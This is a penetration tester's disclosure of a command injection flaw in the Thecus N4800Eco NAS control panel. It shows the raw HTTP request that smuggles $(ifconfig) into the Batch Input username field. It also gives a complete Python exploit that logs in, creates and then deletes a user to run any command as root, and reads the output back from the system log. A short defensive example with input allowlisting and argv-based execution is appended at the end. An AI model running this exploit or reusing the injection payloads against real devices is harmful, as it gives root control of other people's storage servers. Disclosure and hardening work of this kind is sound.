UNSAFE-INLINE
Thecus N4800Eco NAS Server Control Panel Command Injection
A command injection vulnerability that lets an attacker execute commands with root privileges.
I discovered a command injection vulnerability in the Thecus N4800Eco NAS Server control panel during a penetration test. I could not analyze the source code because I didn't have enough time. Hence, I will describe only how the vulnerability was detected.

Description

First, I tried to add a user through Local User Configuration, but the server didn't accept special characters such as $)( . Users and groups can also be created using the Batch Input option under the User and Group Authentication section. I set Batch Content to $(ifconfig),22222,9999, which corresponds to username, password and group name.
Request:

```
POST /adm/setmain.php?fun=setbatch HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: https://target
Connection: close
Referer: https://target/adm/index.php
Cookie: select_md=0; MYSESSID=*

batch_content=%24(ifconfig)%2C22222%2C9999
```

So the filtering can be bypassed by using the Batch Content option to add a malicious payload as the username. After adding the user, I sent a second request to delete the $(ifconfig) user, and a "Local User remove succeeds" response was returned. However, the user was not deleted, which was very interesting to me. I tried to understand what happened and noticed that there is a system log section.
Surprisingly, I saw that the ifconfig command had been executed.
To verify the command injection vulnerability, I tried another command, id.
So there is a command injection vulnerability that allows executing commands with root privileges. The username parameter seems to be vulnerable. It is time to write a basic Python script.

```python
import requests
import sys
import urllib3


# To fix SSL error that occurs when script is started.
# 1- Open /etc/ssl/openssl.cnf file
# At the bottom of the file:
# [system_default_sect]
# MinProtocol = TLSv1.2
# CipherString = DEFAULT@SECLEVEL=2
# 2- Set value of MinProtocol as TLSv1.0


def readResult(s, target):
    # Query the newest entry of the system log, where the command output appears.
    d = {
        "fun": "setlog",
        "action": "query",
        "params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]'
    }
    url = "https://" + target + "/adm/setmain.php"
    resultReq = s.post(url, data=d, verify=False)
    tokens = resultReq.text.split()
    print("[+] Reading system log...\n")
    # Set your command output range
    print(tokens[5:8])


def delUser(s, target, command):
    # Second request: deleting the batch-created user is the step that runs the command.
    d = {
        "action": "delete",
        "username": "$(" + command + ")"
    }
    url = "https://" + target + "/adm/setmain.php?fun=setlocaluser"
    delUserReq = s.post(url, data=d, allow_redirects=False, verify=False)

    if 'Local User remove succeeds' in delUserReq.text:
        print('[+] %s command was executed successfully' % command)
    else:
        print('[-] %s command was not executed!' % command)
        sys.exit(1)
    readResult(s, target)


def addUser(s, target, command):
    # First request: Batch Input accepts the username that Local User Configuration rejects.
    d = {'batch_content': '%24(' + command + ')%2C22222%2C9999'}
    url = "https://" + target + "/adm/setmain.php?fun=setbatch"
    addUserReq = s.post(url, data=d, allow_redirects=False, verify=False)

    if 'Users and groups were created successfully.' in addUserReq.text:
        print('[+] Users and groups were created successfully')
    else:
        print('[-] Users and groups were not created')
        sys.exit(1)
    delUser(s, target, command)


def login(target, username, password, command=None):
    # Authenticate to the control panel; the session cookie is reused by later requests.
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    s = requests.Session()
    d = {
        "&eplang": "english",
        "p_pass": password,
        "p_user": username,
        "username": username,
        "pwd": password,
        "action": "login",
        "option": "com_extplorer"
    }
    url = "https://" + target + "/adm/login.php"
    loginReq = s.post(url, data=d, allow_redirects=False, verify=False)

    if '"success":true' in loginReq.text:
        print('[+] Authentication successful')
    elif '"success":false' in loginReq.text:
        print('[-] Authentication failed!')
        sys.exit(1)
    else:
        print('[-] Something went wrong!')
        sys.exit(1)
    addUser(s, target, command)


def main(args):
    if len(args) != 5:
        print("usage: %s targetIp:port username password command" % (args[0]))
        print("Example 192.168.1.13:80 admin admin id")
        sys.exit(1)
    login(target=args[1], username=args[2], password=args[3], command=args[4])


if __name__ == "__main__":
    main(args=sys.argv)
```
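
The gap described above is that Batch Input skipped the character filtering applied in Local User Configuration, and the stored username later reached a shell on deletion. The following is an added example, not code from the original post or from Thecus, of the server-side handling that closes both ends; the allowlist pattern, the function names and the `userdel` command are assumptions.

```python
import re

# Assumption: allowlist for account and group names; the device's real rules are not on the page.
NAME_RE = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,31}")


def valid_name(value):
    """True only if the whole value matches the allowlist (no shell metacharacters)."""
    return NAME_RE.fullmatch(value) is not None


def parse_batch(batch_content):
    """Parse 'username,password,group' lines into (accepted, rejected)."""
    accepted, rejected = [], []
    for lineno, line in enumerate(batch_content.splitlines(), 1):
        if not line.strip():
            continue
        fields = [f.strip() for f in line.split(",")]
        if len(fields) != 3:
            rejected.append((lineno, "expected username,password,group"))
        elif not valid_name(fields[0]):
            rejected.append((lineno, "invalid username"))
        elif not valid_name(fields[2]):
            rejected.append((lineno, "invalid group"))
        elif not fields[1] or any(ord(c) < 32 for c in fields[1]):
            rejected.append((lineno, "invalid password"))
        else:
            accepted.append(tuple(fields))
    return accepted, rejected


def delete_user_argv(username):
    """Build the deletion command as an argv list, re-validating at the sink."""
    if not valid_name(username):
        raise ValueError("invalid username")
    # Hypothetical command; an argv list run without a shell never expands $(...).
    return ["userdel", "--", username]


if __name__ == "__main__":
    # Constructed sample: the payload from the post plus one ordinary entry.
    sample = "$(ifconfig),22222,9999\nalice,s3cret,staff\n"
    print(parse_batch(sample))
    print(delete_user_argv("alice"))
```

The same `valid_name` check runs on every input path and again at the point where the name is handed to the operating system, so a value stored through one form cannot bypass the filter applied in another.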